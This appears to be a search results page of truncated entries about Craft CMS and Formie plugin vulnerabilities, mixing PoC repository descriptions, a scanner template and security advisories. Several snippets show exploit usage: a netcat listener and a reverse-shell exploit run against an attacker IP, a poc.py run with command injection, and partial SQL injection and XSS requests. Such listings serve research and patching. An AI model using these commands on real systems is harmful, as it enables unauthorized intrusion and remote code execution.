2815 matches found
CVE-2025-32432-POC
Craft CMS CVE-2025-32432 シングルターゲットPoC 許可されたテストのみ。 このリポジトリは、管理されたラボ環境、Hack The Box などのCTFプラットフォーム、内部検証、および防御的検証を目的としています。所有していないシステム、または明示的なテスト許可を得ていないシステムに対して実行しないでください。 概要 このプロジェクトには、認証前のCraft CMSリモートコード実行の問題である CVE-2025-32432 のシングルターゲット概念実証(PoC)が含まれています。 このPoCは2つの段階で動作します: 1. 脆弱性の確認 — Craft...
keystone
Keystone Engine Keystone is a lightweight multi-platform, multi-architecture assembler framework. It offers some unparalleled features: Multi-architecture, with support for Arm, Arm64 AArch64/Armv8, Ethereum Virtual Machine, Hexagon, Mips, PowerPC, RISC-V, Sparc, SystemZ & X86 include 16/32/64bit...
CVE-2025-32432-PoC
CVE-2025-32432:日志投毒到 RCE 的漏洞利用工具 描述 该仓库包含一个用 Go 编写的专业概念验证(PoC)漏洞利用程序,旨在演示 Craft CMS 中的一条关键漏洞链。该利用程序借助一个日志投毒漏洞实现本地文件包含(LFI),最终通过反弹 Shell 达成远程代码执行(RCE)。 技术解析 该利用程序遵循多阶段执行链: 1. 日志投毒 该工具首先向目标发送一个未经验证的 GET 请求。通过操纵 a 参数并通过 Cookie 提供自定义的 CraftSessionId,攻击者可以强制应用程序将 PHP 载荷写入位于...
CVE-2024-56145-craftcms-rce
スクリプトを再度実行する前に、次のコマンドを実行してください: fuser -k 6666/tcp 使用方法 - python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200 カスタムコマンドも使用できます。例:python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami" -i はあなたのIPまたはVPSのIPです(ipconfig / ifconfig で確認できます)。 例:python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t...
Craft-CMS-Exploit
このPythonスクリプトは、人気のあるコンテンツ管理システムであるCraft CMSのリモートコード実行脆弱性(CVE-2023-41892)を悪用します。この脆弱性はバージョン4.0.0-RC1から4.4.14に影響し、攻撃者がPHPリバースシェルのように任意のコードをリモートで実行することを可能にします。 使用方法 まず、別のシェルでnetcatリスナーを起動します: nc -nlvp 1234 次に、自分のIPアドレスを確認し、エクスプロイトを実行します: python3 exploit.py -r 10.10.16.47 -p 1234...
CVE-2024-37843-POC
CVE-2024-37843-POC CVE-2024-37843のPOCです。Craft CMSの時間ベースのブラインドSQLインジェクション 詳細はブログで確認できます POC root@kitploit: curl -X POST '/api/' -H 'Content-Type:application/json' -d '"query":"query IntrospectionQuery assetsorderBy: "assets.volumeId -- \\ \n \n LIMIT 5 AS subquery\nINNER JOIN assets assets ON...
Craft CMS - Remote Code Execution via Template Path Manipulation
This template identifies a critical Remote Code Execution RCE vulnerability in Craft CMS, identified as GHSA-2p6p-9rc9-62j9. The vulnerability exists due to improper handling of the --templatesPath query parameter, allowing attackers to execute arbitrary code by referencing malicious Twig...
Craft-CMS-3.0.25---Cross-Site-Scripting
Craft-CMS-3.0.25 - クロスサイトスクリプティング Craft CMS 3.0.25 - クロスサイトスクリプティングの脆弱性 CVE-CVE-2018-20418 https://vulners.com/cve/CVE-2018-20418 概念実証 コンソールタブから新しいタイトルを保存することで、クロスサイトスクリプティング(XSS)を実行できます。 root@kitploit: POST /admin-panel-path/index.php?p=admin/actions/entries/save-entry HTTP/1.1 Host: IP:PORT...
CVE-2023-41892
CVE-2023-41892 - Craft CMS リモートコード実行 RCE 参照: https://github.com/advisories/GHSA-4w8r-3xrw-v25g https://securityonline.info/craft-cms-fixes-rce-cve-2023-41892-flaw-rated-10-out-of-10-on-severity-scale/ https://blog.calif.io/p/craftcms-rce...
craftcms-vcard-exploit
Craft CMS vCard プラグインのデシリアライゼーション脆弱性 Craft CMSには、「vCard」という名前の連絡先を.vcfファイル形式でダウンロードするためのプラグインがあります。このプラグインはCraftのリポジトリとGithubで確認できます: Craft Plugin Store Github 説明...
CVE-2025-32432
🔐 CVE-2025-32432 — Craft CMS 事前認証RCE Craft CMS における事前認証リモートコード実行 発見・開発者:Mohammed Idrees Banyamer 📌 概要 CVE-2025-32432 は、Craft CMS の複数バージョンに影響する重大な事前認証リモートコード実行(RCE)脆弱性です。無害化されていないセッションデータの保存と安全でないデシリアライゼーションガジェットを連鎖させることで、認証されていない攻撃者がリモートサーバー上で任意のコマンドを実行できます。 🎯 影響を受けるバージョン...
Formie: Missing authorization on sent notification resend modal exposes submission PII
Impact The control panel action formie/sent-notifications/get-resend-modal-content SentNotificationsController::actionGetResendModalContent performed only requireAcceptsJson and loaded a SentNotification by request id without permission or object-level authorization checks. Any authenticated user...
GHSA-9RG8-2WVR-FGJH Formie: Missing authorization on sent notification resend modal exposes submission PII
Impact The control panel action formie/sent-notifications/get-resend-modal-content SentNotificationsController::actionGetResendModalContent performed only requireAcceptsJson and loaded a SentNotification by request id without permission or object-level authorization checks. Any authenticated user...
CVE-2025-32432-exploit-by-P34NUT
CVE-2025-32432 — Craft CMS 認証前 RCE エクスプロイト 作者: P34NUT2 脆弱性: Craft CMS におけるリモートコード実行 認証前 CVE: CVE-2025-32432 対象: 脆弱な Craft CMS インスタンス 3.x / 4.x / 5.x — Hack The Box: Orion で検証済み ⚠️ 免責事項 このツールは、Hack The Box、TryHackMe、またはあなたが所有するか、テストに対する明示的な書面による許可を得ているプライベートラボ環境など、教育目的および許可されたペネトレーションテストに厳密に限定して...
CVE-2026-76089
Formie is a Craft CMS plugin for creating forms. Prior to 2.2.23 and 3.1.31, Formie's formie/sent-notifications/get-resend-modal-content control panel action in SentNotificationsController::actionGetResendModalContent accepts a request-supplied notification ID without permission or object-level...
CVE-2026-76087
Formie is a Craft CMS plugin for creating forms. Prior to 2.2.23 and 3.1.31, Formie's anonymous formie/submissions/submit action in SubmissionsController::actionSubmit trusts a client-supplied submissionId when loading an incomplete submission without session binding, ownership validation, or a...
Formie: Unauthenticated users can overwrite incomplete submissions via submit action
Impact The anonymous front-end action formie/submissions/submit SubmissionsController::actionSubmit trusted a client-supplied submissionId when loading an incomplete submission, with no session binding, ownership check, or edit token validation. An unauthenticated attacker could enumerate...
CVE-2026-76087 Formie: Unauthenticated users can overwrite incomplete submissions via submit action
Formie is a Craft CMS plugin for creating forms. Prior to 2.2.23 and 3.1.31, Formie's anonymous formie/submissions/submit action in SubmissionsController::actionSubmit trusts a client-supplied submissionId when loading an incomplete submission without session binding, ownership validation, or a...
CVE-2026-76087 Formie: Unauthenticated users can overwrite incomplete submissions via submit action
Formie is a Craft CMS plugin for creating forms. Prior to 2.2.23 and 3.1.31, Formie's anonymous formie/submissions/submit action in SubmissionsController::actionSubmit trusts a client-supplied submissionId when loading an incomplete submission without session binding, ownership validation, or a...
CVE-2026-76087
Formie is a Craft CMS plugin for creating forms. Prior to 2.2.23 and 3.1.31, Formie's anonymous formie/submissions/submit action in SubmissionsController::actionSubmit trusts a client-supplied submissionId when loading an incomplete submission without session binding, ownership validation, or a...